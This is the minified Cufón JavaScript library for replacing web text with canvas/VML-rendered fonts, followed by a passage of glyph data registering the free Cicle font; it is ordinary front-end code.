// Copyright (c) 2009 Simo Kinnunen.
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I-1]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.alt}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.alt=w;n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());

// CICLE FONT - Free License (La Tipomatika)
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"166,-122r-130,0r0,122r-20,0r0,-249r20,0r0,107r130,0r0,-107r19,0r0,249r-19,0r0,-122","w":200},{"d":"157,-152r-14,14v-38,-48,-116,-17,-116,49v0,63,76,97,115,49r14,14v-50,60,-149,18,-149,-63v0,-82,101,-125,150,-63","w":172},{"d":"39,-8v0,6,-4,11,-10,11v-6,0,-11,-5,-11,-11v0,-6,5,-10,11,-10v6,0,10,4,10,10xm20,-35r0,-212r17,0r0,212r-17,0","w":63},{"d":"200,-33v-66,79,-192,16,-192,-90v0,-107,124,-170,193,-91r-13,14v-58,-65,-161,-14,-161,77v0,85,94,140,153,83r0,-66r-67,0r0,-19r87,0r0,92","w":217},{"d":"86,0r-21,0v-10,-45,-30,-80,-33,-132v46,5,82,-8,82,-48v2,-50,-69,-67,-89,-22r-14,-14v30,-55,126,-32,122,36v-1,41,-32,73,-80,68xm71,31v0,-7,6,-12,12,-12v7,0,11,5,11,12v0,7,-4,13,-11,13v-6,0,-12,-6,-12,-13","w":147},{"d":"15,-249r19,0r122,208r0,-208r20,0r0,249r-19,0r-122,-208r0,208r-20,0r0,-249","w":193},{"d":"19,-153r0,-27r27,0r0,27r-27,0xm7,19v8,-12,17,-23,14,-46r22,0r0,26r-32,27","w":60},{"d":"15,0r0,-19r106,-141r-105,0r0,-20r132,0r0,19r-106,141r106,0r0,20r-133,0","w":162},{"d":"63,-194v-31,0,-38,-24,-58,-35r31,0","w":73},{"d":"159,-73v5,-13,11,-22,15,-38r22,5v-5,23,-18,35,-22,55v8,13,10,17,23,27r0,24v-18,-11,-24,-23,-37,-36v-19,22,-44,36,-72,36v-43,0,-74,-31,-74,-68v0,-29,25,-58,62,-73v-20,-21,-35,-45,-31,-56v0,-26,22,-51,57,-51v32,0,54,22,54,49v0,22,-21,44,-51,59xm174,-50r0,-1r0,1xm134,-199v0,-19,-14,-34,-34,-34v-32,0,-44,42,-20,62v6,5,12,21,19,17v27,-15,35,-27,35,-45xm86,-129v-29,18,-49,38,-49,59v0,25,21,52,51,52v23,1,45,-16,59,-35","w":214},{"d":"8,-247v44,-1,23,60,27,97v1,11,9,16,22,14r0,19v-12,-1,-22,1,-22,13v0,39,17,104,-27,104r0,-19v4,0,6,-1,7,-1r0,-89v2,-8,7,-13,14,-13v0,-3,1,-6,1,-10v-29,-8,-10,-63,-15,-95r-7,0r0,-20","w":65},{"d":"79,0r-73,-180r21,0r62,150r60,-150r22,0r-73,180r-19,0","w":180},{"d":"112,0r0,-11v-34,33,-101,7,-99,-41v2,-46,45,-62,99,-56v3,-50,-34,-63,-78,-49r-4,-18v51,-19,101,1,101,59v1,32,-3,99,5,116r-24,0xm72,-17v37,0,44,-31,40,-71v-39,-2,-79,-1,-79,36v0,20,17,35,39,35","w":146},{"d":"73,-134r0,-94v-53,11,-53,83,0,94xm93,-111r0,93v55,-6,53,-85,0,-93xm73,-263r20,0r0,15v25,1,46,12,61,29r-15,13v-11,-13,-28,-22,-46,-23r0,99v36,8,63,35,63,67v0,33,-28,60,-63,65r0,21r-20,0v-1,-6,3,-17,-2,-20v-25,-3,-47,-16,-60,-35r16,-13v9,14,27,27,46,28r0,-96v-37,-8,-62,-35,-62,-68v0,-34,26,-60,62,-66r0,-16","w":167},{"d":"55,-19r7,0r0,19v-10,0,-26,-7,-26,-19r0,-85v0,-12,-10,-14,-23,-13r0,-19v13,2,22,-3,23,-14v4,-36,-17,-98,26,-97r0,20v-3,0,-7,0,-7,-1v-5,32,13,88,-15,96r0,10v30,9,9,70,15,103","w":80},{"d":"82,3v-74,0,-96,-106,-35,-136v-52,-27,-27,-115,35,-115v64,0,90,87,37,115v62,31,39,136,-37,136xm37,-185v0,24,21,43,45,43v25,0,46,-19,46,-43v0,-24,-21,-44,-46,-44v-24,0,-45,20,-45,44xm30,-69v0,28,24,52,52,52v30,0,54,-24,54,-52v0,-29,-24,-54,-54,-54v-28,0,-52,25,-52,54","w":165},{"d":"65,-93r-55,-87r24,0r44,70r44,-70r25,0r-57,90r57,90r-24,0r-46,-73r-45,73r-24,0","w":159},{"d":"34,-123v0,59,32,106,71,106v40,0,72,-47,72,-106v0,-59,-32,-106,-72,-106v-39,0,-71,47,-71,106xm14,-123v0,-69,41,-125,91,-125v50,0,91,56,91,125v0,69,-41,126,-91,126v-50,0,-91,-57,-91,-126","w":210},{"d":"18,0r0,-256r14,0r0,256r-14,0","w":47},{"d":"19,0r0,-27r28,0r0,27r-28,0xm19,-153r0,-27r28,0r0,27r-28,0","w":65},{"d":"89,-249r0,187v1,51,-48,87,-80,48r13,-14v21,24,47,4,47,-33r0,-188r20,0","w":109},{"w":92},{"d":"187,-249r-142,229r127,0r0,20r-163,0r143,-229r-131,0r0,-20r166,0","w":197},{"d":"7,-23r14,-14v28,40,104,20,103,-30v-2,-34,-40,-55,-87,-49r0,-20v46,5,88,-11,88,-46v1,-46,-77,-63,-104,-26r-14,-15v38,-47,138,-22,138,41v0,24,-16,45,-38,56v65,30,35,130,-40,130v-24,0,-46,-11,-60,-27","w":155},{"d":"55,-19r7,0r0,19v-10,0,-26,-7,-26,-19r0,-85v0,-12,-10,-14,-23,-13r0,-19v13,2,22,-3,23,-14v4,-36,-17,-98,26,-97r0,20v-3,0,-7,0,-7,-1v-5,32,13,88,-15,96r0,10v30,9,9,70,15,103","w":75},{"d":"5,-197v8,-13,15,-28,9,-48r22,-2r3,25r-29,30","w":43},{"d":"8,-77r17,-21r36,0v6,-15,11,-30,17,-45r-70,0r16,-20r61,0r25,-67r21,0r-24,67r78,0r25,-67r21,0r-24,67r42,0r-16,20r-33,0v-6,15,-12,30,-17,45r66,0r-16,21r-58,0r-28,77r-21,0r28,-77r-79,0r-28,77r-21,0r28,-77r-46,0xm99,-143r-17,45r79,0v5,-15,12,-30,17,-45r-79,0","w":257},{"d":"115,-112v-27,24,-72,-10,-97,12r-9,-16v28,-24,73,10,99,-12","w":124},{"d":"203,-132v0,-52,-35,-100,-86,-101v-47,0,-86,46,-86,101v0,53,36,96,82,99v-2,-6,-8,-10,-16,-10r0,-17v18,0,32,11,35,26v40,-9,71,-49,71,-98xm222,-132v0,58,-39,106,-89,115v3,20,16,31,24,12r14,13v-20,31,-50,12,-56,-23v-55,-3,-103,-53,-103,-117v0,-67,49,-118,105,-118v57,0,105,52,105,118","w":239},{"d":"105,0r-92,-249r21,0r80,217r81,-217r21,0r-92,249r-19,0","w":230},{"d":"24,-195r-14,-13r47,-39r18,0r0,247r-20,0r0,-221v-10,9,-21,18,-31,26","w":94},{"d":"101,-89r-89,0r1,-18r81,-141r17,10r-75,129r65,0r0,-53r20,0r0,53r34,0r0,20r-34,0r0,89r-20,0r0,-89","w":170},{"d":"23,-229r8,-22v56,50,56,250,-1,297r-12,-19v44,-33,46,-215,5,-256","w":88},{"d":"208,-249r26,0r-103,137r0,112r-20,0r0,-112r-102,-137r26,0r86,118","w":245},{"d":"181,-70v22,0,47,-43,47,-78v0,-42,-35,-77,-87,-77v-58,0,-102,45,-102,106v0,60,38,96,105,96v41,0,72,-17,86,-39r27,0v-15,34,-55,62,-112,62v-75,0,-128,-41,-128,-117v0,-75,50,-131,125,-131v57,0,109,36,109,100v0,51,-45,122,-99,90v-29,24,-77,1,-76,-38v1,-37,31,-53,74,-48v4,-34,-16,-40,-42,-30r-5,-21v63,-18,74,32,65,108v-1,9,-1,17,13,17xm123,-67v27,0,32,-28,29,-58v-30,-2,-59,1,-59,29v0,16,14,29,30,29","w":271},{"d":"166,0r-153,0r0,-19r153,0r0,19"},{"d":"310,-249r-91,249r-20,0r-37,-99r-36,99r-19,0r-92,-249r21,0r80,218r36,-98r-44,-120r20,0r81,217r80,-217r21,0","w":329},{"d":"25,-179r89,90r-89,88r-14,-14r75,-74r-75,-76","w":120},{"d":"67,-228v0,-7,5,-12,13,-12v5,0,11,5,11,12v0,6,-6,12,-11,12v-8,0,-13,-6,-13,-12xm17,68r1,-19v29,5,51,-13,52,-44r0,-185r20,0r0,188v-4,39,-30,68,-73,60","w":127},{"d":"103,0r-90,-247r21,0r91,247r-22,0","w":133},{"d":"141,-142r0,20r-107,0r0,102r126,0r0,20r-146,0r0,-249r146,0r0,19r-126,0r0,88r107,0","w":174},{"d":"134,-119r-88,100r110,0r0,19r-137,0r0,-18r102,-115v33,-34,6,-99,-44,-96v-15,0,-31,7,-43,18r-14,-14v46,-48,139,-13,136,54v0,21,-10,38,-22,52","w":171},{"d":"144,-172r0,-6r19,0r0,246r-19,0r0,-83v-59,33,-132,-11,-132,-78v0,-67,72,-110,132,-79xm144,-39r0,-106v0,-10,-21,-18,-48,-18v-35,0,-65,31,-65,70v0,61,80,92,113,54"},{"d":"23,-138r0,-20r122,0r0,20r-122,0xm23,-70r0,-20r122,0r0,20r-122,0","w":158},{"d":"42,-247r20,0r0,70r47,0r0,19r-47,0r0,158r-19,0r0,-158r-26,0r0,-19r25,0r0,-70","w":122},{"d":"202,-214r-14,13v-59,-64,-159,-13,-159,77v0,89,99,143,158,78r14,13v-68,78,-192,17,-192,-91v0,-67,50,-126,113,-126v30,0,59,14,80,36","w":212},{"d":"85,-127r-71,-122r22,0r62,104r61,-104r23,0r-72,124r72,125r-23,0r-63,-107r-63,107r-23,0","w":194},{"d":"104,-17v27,0,49,-10,49,-19r0,-110v-3,-9,-22,-16,-49,-16v-37,0,-68,32,-68,71v0,40,30,74,68,74xm153,-1r0,-8v-61,33,-136,-11,-136,-82v0,-69,75,-113,136,-80r0,-76r19,0r0,211v0,0,0,30,7,35r-26,0","w":192},{"d":"17,68r3,-20v37,16,56,-31,67,-62r-69,-168r21,0r57,143r57,-143r21,0r-83,209v-14,32,-40,49,-74,41","w":192},{"d":"125,-247r-90,247r-22,0r91,-247r21,0","w":136},{"d":"14,-33r16,-12v21,42,109,35,109,-17v0,-25,-23,-47,-52,-51v-41,-5,-73,-35,-73,-70v0,-69,109,-89,145,-37r-16,13v-25,-40,-108,-26,-108,23v0,26,23,49,54,52v40,5,70,35,70,69v0,71,-116,87,-145,30","w":174},{"d":"34,-249r